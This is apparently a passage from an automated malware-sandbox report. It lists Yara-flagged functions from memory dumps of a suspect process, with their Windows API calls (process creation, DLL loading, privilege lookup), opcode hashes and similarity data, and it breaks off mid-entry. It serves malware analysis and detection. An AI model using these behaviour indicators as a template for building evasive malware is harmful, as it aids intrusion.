                                            • Opcode ID: 0e3f9c2017521587f2c9b0f5f3e7365a73a2e9058f1652688f4922f4f99f5404
                                            • Instruction ID: c28f45d189deeb3513fe6993772949c7030c847a8eb1b81047e89f268b9bc463
                                            • Opcode Fuzzy Hash: 0e3f9c2017521587f2c9b0f5f3e7365a73a2e9058f1652688f4922f4f99f5404
                                            • Instruction Fuzzy Hash: D1E0C235200208ABD710EFE4CC85F977B68EF44B10F058155FA589B241D530FA0087E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DD9E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(02DD4D20,?,?,02DD4D20,00000000,FFFFFFFF), ref: 02DD9EB5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 304fc0607328a8d752e98ad5e4bc2577fd72da5b22f5436779ddbf9a38979f97
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: 39D012752002146BD710EB98CC85E97775DEF44750F158455FA585B241C530F90086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a609c712f5691739233884b699d1824f5d83406632b004a09e54bca7597ac762
                                            • Instruction ID: e21babb11920d43e661fa082eed21d4f8f3fbe7497f273ab914a696491a433cb
                                            • Opcode Fuzzy Hash: a609c712f5691739233884b699d1824f5d83406632b004a09e54bca7597ac762
                                            • Instruction Fuzzy Hash: A190026921315802D180B159550861A044597D1242F91D815A0006558CCA5588796361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 700a882f85ddb8e06c69a2c79447b6363a41cedcdcf87d5d5b437ed8c0c943cc
                                            • Instruction ID: cacee85c7f05bcfa1ec4d8091ad16147698e88fd2dc25ae4920d761290541ae0
                                            • Opcode Fuzzy Hash: 700a882f85ddb8e06c69a2c79447b6363a41cedcdcf87d5d5b437ed8c0c943cc
                                            • Instruction Fuzzy Hash: D890027131129C02D110A1598504716044597D1241F51C811A0815558D87D588A17162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7bb1bf8346db286480860ce3c17a95d7be09d7f5730424ff697e811484c9c344
                                            • Instruction ID: 3244e496f3876ce24b1d368b26c4b4eb310966cbc21ec76acea063dc7bfb1038
                                            • Opcode Fuzzy Hash: 7bb1bf8346db286480860ce3c17a95d7be09d7f5730424ff697e811484c9c344
                                            • Instruction Fuzzy Hash: 7A90027120115C02D100A5995508656044597E0341F51D411A5015555EC7A588A17171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 039096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 66ebe6a259474a90383f3749de4106092079bdd5876665b4cb5adde640dd37b9
                                            • Instruction ID: 23e03b3ec2c1fd24f780087c355e235281ca596e5839bc70b63e4f0eaf0e9fb0
                                            • Opcode Fuzzy Hash: 66ebe6a259474a90383f3749de4106092079bdd5876665b4cb5adde640dd37b9
                                            • Instruction Fuzzy Hash: 8290047130115C43D100F15D4504F570445D7F0341F51C417F0115754DC755CC717571
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 039096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1c75d3d9d1050bdf899eafbee78b02ce375ecce2d9e856f2009741e178bb5429
                                            • Instruction ID: ae64a0a8af30053cc5c846ce296c2d536ac6bafa58b0c83df6b6b0463effe029
                                            • Opcode Fuzzy Hash: 1c75d3d9d1050bdf899eafbee78b02ce375ecce2d9e856f2009741e178bb5429
                                            • Instruction Fuzzy Hash: CF9002712011DC02D110A159850475A044597D0341F55C811A4415658D87D588A17161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 48af5db91cae5576ad90fdd1738814bac556efb8a53d2af972be651a44eb9d22
                                            • Instruction ID: 054cfdb15839baf081038da687e56f4cb8a01a47da8f4bd53a3d2c150303807f
                                            • Opcode Fuzzy Hash: 48af5db91cae5576ad90fdd1738814bac556efb8a53d2af972be651a44eb9d22
                                            • Instruction Fuzzy Hash: 1090027120519C42D140B1594504A56045597D0345F51C411A0055694D97658D65B6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fd3629f8e4dc4c43bb79f260ce689748903ddc6f9377dd653c1496ba684104a5
                                            • Instruction ID: 86c517ce47ff304d408599edbf8c4927c72e119f070c9cd3de260e305ee5e798
                                            • Opcode Fuzzy Hash: fd3629f8e4dc4c43bb79f260ce689748903ddc6f9377dd653c1496ba684104a5
                                            • Instruction Fuzzy Hash: AF90026121195842D200A5694D14B17044597D0343F51C515A0145554CCA5588716561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 09dae67b1e3bd0e3bd6b1a0f80063bca9906378b3ebdfb72717ae11bb3c24ee5
                                            • Instruction ID: 9d2f9121b91508718561e0c6a838b161091a5ce05d5f39b7aeeac2c47503a286
                                            • Opcode Fuzzy Hash: 09dae67b1e3bd0e3bd6b1a0f80063bca9906378b3ebdfb72717ae11bb3c24ee5
                                            • Instruction Fuzzy Hash: B490027120115C02D180B159450465A044597D1341F91C415A0016654DCB558A6977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 039099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 09f59a0d9eeef2b457fc167556bb41c8e4a8122f3efdb46191a8bcc9259f0de8
                                            • Instruction ID: 16abfd48aaca3b2b0d6a5998433b6e46a49b3d340ee395db07ffc1022a4deb33
                                            • Opcode Fuzzy Hash: 09f59a0d9eeef2b457fc167556bb41c8e4a8122f3efdb46191a8bcc9259f0de8
                                            • Instruction Fuzzy Hash: 839002A134115C42D100A1594514B160445D7E1341F51C415E1055554D8759CC627166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 039095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 749667dc4af514f1eeb073796b419bfd542eaeb92b1be0e66088db6d09dbc92a
                                            • Instruction ID: f9a7d2c8b1dec53a347ddb0bf2b57bc0ad9833e53db54d79634aa49e4417ee0d
                                            • Opcode Fuzzy Hash: 749667dc4af514f1eeb073796b419bfd542eaeb92b1be0e66088db6d09dbc92a
                                            • Instruction Fuzzy Hash: 7E9002A1202158034105B1594514626444A97E0241B51C421E1005590DC66588A17165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b6283aa2dd35aaa00576137784a12fe681c7e3bc8b99e3e22b9cd4b3adc36231
                                            • Instruction ID: f6fd415ed2a9b5ebcebe0c12662e0ac940cc53e1fecd125d1126940483f8393a
                                            • Opcode Fuzzy Hash: b6283aa2dd35aaa00576137784a12fe681c7e3bc8b99e3e22b9cd4b3adc36231
                                            • Instruction Fuzzy Hash: 579002B120115C02D140B1594504756044597D0341F51C411A5055554E87998DE576A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d3f2600d98a1ed16adbf3332f0f469615a3cd44c2a3bc0dad5dd31d54168f52b
                                            • Instruction ID: 86ef3b60fcd78c24ac843ea61f9af1b07f9e7d70c3f3dd704db15b70e2a25f02
                                            • Opcode Fuzzy Hash: d3f2600d98a1ed16adbf3332f0f469615a3cd44c2a3bc0dad5dd31d54168f52b
                                            • Instruction Fuzzy Hash: 1790047531115C030105F55D070451704C7D7D53D1351C431F1007550CD771CC717171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ab334564f87ca8abffd9702583f98f291504f0a24732cfdcf2a0082573ddbb3b
                                            • Instruction ID: 3d38ea1f488bb4d074e387e903d6c5671c22195bcf98e79d6552a351e3a0414c
                                            • Opcode Fuzzy Hash: ab334564f87ca8abffd9702583f98f291504f0a24732cfdcf2a0082573ddbb3b
                                            • Instruction Fuzzy Hash: C9900261242199525545F15945045174446A7E0281791C412A1405950C86669866E661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03909860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b5208bf2c0ca2aac646eefd960677a7229d0cf624b34cc7aeac89a3e4d9f122c
                                            • Instruction ID: 703defdd1346535a67320023fad25b91414788c8ea705a739ffdae3e9a3c5299
                                            • Opcode Fuzzy Hash: b5208bf2c0ca2aac646eefd960677a7229d0cf624b34cc7aeac89a3e4d9f122c
                                            • Instruction Fuzzy Hash: 5690027120115C13D111A1594604717044997D0281F91C812A0415558D97968962B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DDA070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3AF8), ref: 02DDA09D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 1b8925a2d1d36a2e2c1a0ccf1a703b2e83e20db826745f3b5cbf84d373423a55
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 29E046B1200208ABDB18EF99CC88EA777ADEF88750F018558FE086B341C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DC82EA, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 49c94a44935fc4e6899effe35dd6fd38aef1404ba3bae5a45367a636d0e46aba
                                            • Instruction ID: d2b00715a5b2ee04fad523c6047f5b4a958f0cdaea8e44117243202e61ab1ccf
                                            • Opcode Fuzzy Hash: 49c94a44935fc4e6899effe35dd6fd38aef1404ba3bae5a45367a636d0e46aba
                                            • Instruction Fuzzy Hash: D9012832A8022A7AEB21A6949C42FFE772CAB00B51F140009FF04FB2C0E6A47D0647F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DC82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
                                            • Instruction ID: 77630eede90c7880a08e0448fbd5d8bf8ca57fbc08001ce712137bfa47a8cdc6
                                            • Opcode Fuzzy Hash: d1886dacaede67b8a1b47cd7f891b191bb7a411f268118560ec236757dbbaa52
                                            • Instruction Fuzzy Hash: 7601F231A8022D7BE721AA949C42FBE772CAB00B55F140019FF04FB2C0E6A47D068AF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DC82B4, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC836B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 83700650953ae7634fd69d65fb27357517d4e9dae13cf5111cc3594814278904
                                            • Instruction ID: 70f825e8c8e566e305335f1b8807864ee81166e4b7ee7a749ea0cd9b50895c77
                                            • Opcode Fuzzy Hash: 83700650953ae7634fd69d65fb27357517d4e9dae13cf5111cc3594814278904
                                            • Instruction Fuzzy Hash: 7E014E3294051576DA21AAD45C42FFE231DEB40F15F16015DFF44EB3C0E6A55D0596F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DCACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DCAD42
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction ID: 058edf538076d69a0d7c7b6037559766eb2130abf0e4876ded30d986f7d6c671
                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction Fuzzy Hash: FE011EB5E0020EABDF10DFA4DC41F9DB3799B44308F104195E90897240F631EB58CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DDA0DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DDA134
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: a08032073799318443623ae3f431379b61d8d566bc5e0460e856ed145056896e
                                            • Instruction ID: 55510b512b2c3d79b50d146ea8a0b339d15820f0e490ebf7cd97ddceb4b09e8d
                                            • Opcode Fuzzy Hash: a08032073799318443623ae3f431379b61d8d566bc5e0460e856ed145056896e
                                            • Instruction Fuzzy Hash: 4C01AFB2210508BBCB54DF89DC80EEB77AEEF8C754F158258FA4DA7240C630E851CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DDA0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DDA134
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 3d623ffeb2d8ed3b7e8dd36dc65c2f7de585a06c09292c1e046c9fe4570360a4
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: DC01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DDA1C1, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCF1A2,02DCF1A2,?,00000000,?,?), ref: 02DDA200
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 57feec71a1fb8b7225c7baf1dbde007b2319946838952b7b17768df68d6c12bb
                                            • Instruction ID: 6d2d959f3c5c8cb4c9d3814986539c3df005a5d6edf4ce510b5b859c7acdeffd
                                            • Opcode Fuzzy Hash: 57feec71a1fb8b7225c7baf1dbde007b2319946838952b7b17768df68d6c12bb
                                            • Instruction Fuzzy Hash: 4401DCB16042047BEB14DFA4DC84DE777A9EF88210F04C199FD0C8B642CA34A8148BB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DDA030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(02DD4506,?,02DD4C7F,02DD4C7F,?,02DD4506,?,?,?,?,?,00000000,00000000,?), ref: 02DDA05D
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 0bf6350db4a75e83abfcdaede9f6c4a5de224f3277a43d81cda5a0c5b103a6e5
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: CAE012B1200208ABDB14EF99CC80EA777ADEF88650F158558FA086B241C630F9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DDA1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCF1A2,02DCF1A2,?,00000000,?,?), ref: 02DDA200
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: 1706191d80018511a69b3ca12be424687d00c989987c79f672b46545f02b4c17
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: E9E01AB12002086BDB10DF49CC84EE737ADEF89650F018154FA0867241C930E8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DCF697, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,02DC8CF4,?), ref: 02DCF6CB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 6871598d5e345b460535cde8d49a0ebe1612cd98dae4b6078105a511d7e7b283
                                            • Instruction ID: 6883c4a09e2bdc4e8680aa29cc9cf2159c3cd775a46c290a71562fa5197a1a9d
                                            • Opcode Fuzzy Hash: 6871598d5e345b460535cde8d49a0ebe1612cd98dae4b6078105a511d7e7b283
                                            • Instruction Fuzzy Hash: C0E0C2252D83453AEB10BBB49C13F23779A5B05614F4900A8FA889B3C3DA90D4008262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02DCF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,02DC8CF4,?), ref: 02DCF6CB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Offset: 02DC0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction ID: 86f9958c70f4366a468d85c2e3f3a78e13ea318be1e1691d1c2679e19e1ac281
                                            • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                            • Instruction Fuzzy Hash: 55D0A7717903043BEA10FBA4DC03F6732CE9B44B04F490064FA48D73C3D960E4008575
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0390967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7b067157c4b1befe7b964e855f2b5e1d7997c006cbf5f83aa6340530457a6de1
                                            • Instruction ID: d4f12373333345597494645e1a591e14680ae79eb3092e2266a65e04936c62e9
